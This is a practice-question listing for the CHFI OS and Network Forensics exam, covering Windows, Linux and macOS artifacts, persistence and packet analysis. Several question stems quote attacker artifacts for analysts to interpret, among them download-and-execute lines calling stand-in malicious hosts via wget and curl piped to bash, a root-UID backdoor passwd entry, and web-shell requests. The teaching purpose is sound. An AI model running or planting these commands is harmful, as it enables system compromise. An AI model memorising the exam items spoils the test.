Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← OS and Network Forensics practice sets

CHFI OS and Network Forensics • Complete Question Bank

CHFI OS and Network Forensics — All Questions With Answers

Complete CHFI OS and Network Forensics question bank — all 0 questions with answers and detailed explanations.

216
Questions
Free
No signup
Certifications/CHFI/Practice Test/OS and Network Forensics/All Questions
Question 1easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

Question 2mediummultiple choice
Read the full OS and Network Forensics explanation →

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

Question 3hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

Question 4mediummultiple choice
Read the full OS and Network Forensics explanation →

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

Question 5mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

Question 6easymultiple choice
Read the full OS and Network Forensics explanation →

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

Question 7mediummultiple choice
Read the full NAT/PAT explanation →

A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?

Question 8hardmultiple choice
Read the full OS and Network Forensics explanation →

During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?

Question 9mediummultiple choice
Read the full OS and Network Forensics explanation →

Which of the following Windows registry keys is commonly used by malware to achieve persistence by executing a program at user logon?

Question 10easymultiple choice
Read the full network assurance explanation →

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

Question 11hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?

Question 12mediummultiple choice
Read the full OS and Network Forensics explanation →

An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?

Question 13mediummulti select
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)

Question 14hardmulti select
Read the full OS and Network Forensics explanation →

A security team is analyzing a compromised Linux server. Indicators suggest the attacker used a web shell. Which THREE of the following are common persistence mechanisms that may be found on the system? (Select THREE.)

Question 15mediummulti select
Read the full OS and Network Forensics explanation →

An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)

Question 16mediummultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?

Question 17hardmultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?

Question 18easymultiple choice
Read the full NAT/PAT explanation →

Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?

Question 19mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

Question 20easymultiple choice
Read the full OS and Network Forensics explanation →

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

Question 21hardmultiple choice
Read the full OS and Network Forensics explanation →

A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?

Question 22mediummultiple choice
Read the full OS and Network Forensics explanation →

During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?

Question 23easymultiple choice
Read the full OS and Network Forensics explanation →

Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?

Question 24mediummultiple choice
Read the full DNS explanation →

An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?

Question 25hardmultiple choice
Read the full OS and Network Forensics explanation →

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

Question 26mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?

Question 27hardmultiple choice
Read the full OS and Network Forensics explanation →

During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?

Question 28mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO Windows Event IDs are associated with successful logon or explicit credential usage? (Choose TWO.)

Question 29hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Question 30mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO Linux log files are MOST relevant for investigating authentication events and user login activity? (Choose TWO.)

Question 31mediummultiple choice
Read the full OS and Network Forensics explanation →

During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?

Question 32easymultiple choice
Read the full OS and Network Forensics explanation →

In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?

Question 33hardmultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

Question 34mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner needs to extract timeline data from a compromised Linux system for analysis with log2timeline/Plaso. Which of the following command sequences should be used?

Question 35easymultiple choice
Read the full OS and Network Forensics explanation →

In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?

Question 36mediummultiple choice
Read the full OS and Network Forensics explanation →

During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?

Question 37mediummultiple choice
Read the full OS and Network Forensics explanation →

An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?

Question 38hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?

Question 39mediummultiple choice
Read the full OS and Network Forensics explanation →

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

Question 40easymultiple choice
Read the full OS and Network Forensics explanation →

Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?

Question 41hardmultiple choice
Read the full OS and Network Forensics explanation →

An analyst reviews proxy logs and sees repeated requests to a known malicious domain from multiple internal hosts, each using a different User-Agent string. The requests are all GET requests for /images/icon.png. What technique is most likely being used to evade detection?

Question 42easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Event ID is generated when a service is installed on a system?

Question 43mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)

Question 44hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)

Question 45mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Question 46mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

Question 47mediummultiple choice
Read the full OS and Network Forensics explanation →

During a Linux forensic investigation, you find that the file /var/log/auth.log has been deleted. Which of the following artefacts would BEST help determine recent SSH login attempts?

Question 48hardmultiple choice
Read the full OS and Network Forensics explanation →

An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?

Question 49mediummultiple choice
Read the full OS and Network Forensics explanation →

A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?

Question 50easymultiple choice
Read the full OS and Network Forensics explanation →

In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?

Question 51mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner finds a suspicious entry in the Linux file /etc/passwd: 'backdoor:x:0:0:root:/root:/bin/bash'. What is the MOST significant security issue with this entry?

Question 52easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst needs to examine network traffic for signs of a data exfiltration attempt. Which tool is specifically designed for deep packet inspection and can reconstruct TCP streams?

Question 53hardmultiple choice
Read the full OS and Network Forensics explanation →

During a Mac forensic investigation, you examine the unified log for process execution around the time of an incident. Which command-line tool is used to query the macOS unified log?

Question 54mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?

Question 55easymultiple choice
Read the full OS and Network Forensics explanation →

In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?

Question 56hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?

Question 57mediummultiple choice
Read the full OS and Network Forensics explanation →

An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?

Question 58mediummulti select
Read the full OS and Network Forensics explanation →

A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)

Question 59hardmulti select
Read the full OS and Network Forensics explanation →

An analyst is reviewing a Linux system for signs of a rootkit. Which THREE of the following are common indicators of a rootkit infection? (Select THREE.)

Question 60easymulti select
Read the full OS and Network Forensics explanation →

A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)

Question 61mediummultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews Windows Security event logs and finds Event ID 4625 with Logon Type 10. What does this indicate?

Question 62easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?

Question 63hardmultiple choice
Read the full OS and Network Forensics explanation →

During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by a 'Accepted password for root' entry. What is the MOST likely conclusion?

Question 64mediummultiple choice
Read the full OS and Network Forensics explanation →

Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?

Question 65easymultiple choice
Read the full OS and Network Forensics explanation →

In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?

Question 66mediummultiple choice
Read the full OS and Network Forensics explanation →

A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?

Question 67hardmultiple choice
Read the full NAT/PAT explanation →

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

Question 68easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Event ID is generated when a new service is installed on a system?

Question 69mediummultiple choice
Read the full OS and Network Forensics explanation →

A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?

Question 70mediummultiple choice
Read the full OS and Network Forensics explanation →

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

Question 71hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

Question 72mediummultiple choice
Read the full NAT/PAT explanation →

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

Question 73mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)

Question 74hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are indicators of a web shell on a web server? (Select three.)

Question 75easymulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)

Question 76easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst is reviewing Windows Security Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this MOST likely indicate?

Question 77mediummultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?

Question 78mediummultiple choice
Read the full NAT/PAT explanation →

A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?

Question 79hardmultiple choice
Read the full OS and Network Forensics explanation →

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

Question 80easymultiple choice
Read the full OS and Network Forensics explanation →

In Linux forensics, which file contains information about user account passwords in hashed form?

Question 81mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?

Question 82hardmultiple choice
Read the full NAT/PAT explanation →

During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?

Question 83mediummultiple choice
Read the full OS and Network Forensics explanation →

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

Question 84easymultiple choice
Read the full OS and Network Forensics explanation →

Which tool is commonly used in timeline analysis for digital forensics to parse various artifacts and create a super timeline?

Question 85mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

Question 86hardmultiple choice
Read the full OS and Network Forensics explanation →

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

Question 87mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

Question 88mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)

Question 89hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)

Question 90mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Question 91mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?

Question 92hardmultiple choice
Read the full OS and Network Forensics explanation →

During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?

Question 93easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?

Question 94mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

Question 95mediummultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?

Question 96easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?

Question 97mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Mac system for evidence of recent file access. Which artifact provides a timeline of file system events with high precision and is commonly analyzed using tools like mac_apt?

Question 98mediummultiple choice
Read the full OS and Network Forensics explanation →

A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?

Question 99hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?

Question 100easymultiple choice
Read the full OS and Network Forensics explanation →

Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?

Question 101hardmultiple choice
Read the full NAT/PAT explanation →

During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?

Question 102mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

Question 103mediummulti select
Read the full OS and Network Forensics explanation →

A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?

Question 104hardmulti select
Read the full NAT/PAT explanation →

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

Question 105mediummulti select
Read the full OS and Network Forensics explanation →

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Question 106mediummultiple choice
Review the full subnetting walkthrough →

A security analyst detects a sudden spike in failed logon events with Event ID 4625 on a Windows domain controller. The source IP addresses are random and from various external subnets. Which type of attack is MOST likely occurring?

Question 107hardmultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a Windows 10 system, an examiner finds the following registry key: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count. The values contain Rot‑13 encoded data. What is the primary purpose of this artifact?

Question 108mediummultiple choice
Read the full OS and Network Forensics explanation →

An analyst is examining a Linux server and issues the command: cat /var/log/auth.log | grep 'Failed password' | awk '{print $1,$2,$3,$9,$11}' | sort | uniq -c. What is the analyst most likely trying to determine?

Question 109easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows registry hive should be examined to determine the last time a specific external USB drive was connected to a system?

Question 110mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is investigating a macOS system and wants to review a timeline of past application launches and file accesses across multiple days. Which forensic artifact is BEST suited for this purpose?

Question 111hardmultiple choice
Read the full OS and Network Forensics explanation →

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

Question 112easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Event ID is generated when a new service is installed on a system?

Question 113mediummultiple choice
Read the full OS and Network Forensics explanation →

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

Question 114hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

Question 115easymultiple choice
Read the full OS and Network Forensics explanation →

In Linux, which file contains hashed user passwords?

Question 116mediummultiple choice
Read the full DNS explanation →

An analyst reviews NetFlow logs and sees a single internal host communicating with multiple external IPs on port 53 (DNS) over a short period, with each session transferring approximately 1500 bytes. What suspicious activity might this indicate?

Question 117hardmultiple choice
Read the full OS and Network Forensics explanation →

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

Question 118mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)

Question 119hardmulti select
Read the full OS and Network Forensics explanation →

A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)

Question 120easymulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Question 121easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

Question 122mediummultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

Question 123hardmultiple choice
Read the full NAT/PAT explanation →

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

Question 124mediummultiple choice
Read the full DNS explanation →

A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?

Question 125easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?

Question 126mediummultiple choice
Read the full OS and Network Forensics explanation →

A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?

Question 127hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

Question 128mediummultiple choice
Read the full OS and Network Forensics explanation →

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

Question 129easymultiple choice
Read the full OS and Network Forensics explanation →

In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?

Question 130mediummultiple choice
Read the full OS and Network Forensics explanation →

A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?

Question 131hardmultiple choice
Read the full NAT/PAT explanation →

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

Question 132mediummultiple choice
Read the full OS and Network Forensics explanation →

A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?

Question 133mediummulti select
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Question 134hardmulti select
Read the full OS and Network Forensics explanation →

A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?

Question 135mediummulti select
Read the full OS and Network Forensics explanation →

An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?

Question 136easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?

Question 137mediummultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?

Question 138mediummultiple choice
Read the full OS and Network Forensics explanation →

A Linux system administrator notices unusual outbound connections from a server. Which of the following commands would MOST effectively capture a list of all current network connections along with the associated process IDs?

Question 139hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is investigating a Windows 10 system and needs to determine if a USB device was ever connected. Which registry key would provide a comprehensive list of USB devices that have been attached, including the first and last connection times?

Question 140easymultiple choice
Read the full OS and Network Forensics explanation →

An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?

Question 141mediummultiple choice
Read the full NAT/PAT explanation →

During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?

Question 142mediummultiple choice
Read the full OS and Network Forensics explanation →

A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?

Question 143easymultiple choice
Read the full OS and Network Forensics explanation →

Which Linux log file is the PRIMARY source for authentication-related events such as user logins, sudo usage, and failed authentication attempts?

Question 144hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

Question 145mediummultiple choice
Read the full network assurance explanation →

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

Question 146mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

Question 147hardmultiple choice
Read the full OS and Network Forensics explanation →

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

Question 148mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)

Question 149hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are common indicators of a web shell presence on a compromised IIS web server? (Select THREE.)

Question 150easymulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are primary locations for browser history artifacts in a Windows 10 system? (Select TWO.)

Question 151easymultiple choice
Read the full NAT/PAT explanation →

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

Question 152mediummultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a Windows system, an analyst examines the NTUSER.DAT registry hive. Which artifact would MOST likely be found to identify recently accessed documents and folders via the Windows Explorer GUI?

Question 153mediummultiple choice
Read the full OS and Network Forensics explanation →

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

Question 154hardmultiple choice
Read the full NAT/PAT explanation →

During a Mac forensic examination, an investigator needs to find evidence of recently executed applications and accessed files. Which artifact should the investigator prioritize for reconstructing user activity?

Question 155mediummultiple choice
Read the full OS and Network Forensics explanation →

A network analyst captures suspicious traffic and uses Wireshark to examine packets. The analyst notices many TCP SYN packets sent to various ports on a single host with no SYN-ACK replies. What type of activity is MOST likely observed?

Question 156easymultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?

Question 157mediummultiple choice
Read the full OS and Network Forensics explanation →

A Windows system is suspected of having malware that maintains persistence by starting every time a user logs in. Which registry key should be examined FIRST for this persistence mechanism?

Question 158hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst finds an LNK file on a Windows system pointing to a script located in a temporary folder. The LNK file's timestamps show creation time after the script's known execution time. What does this discrepancy likely indicate?

Question 159mediummultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

Question 160easymultiple choice
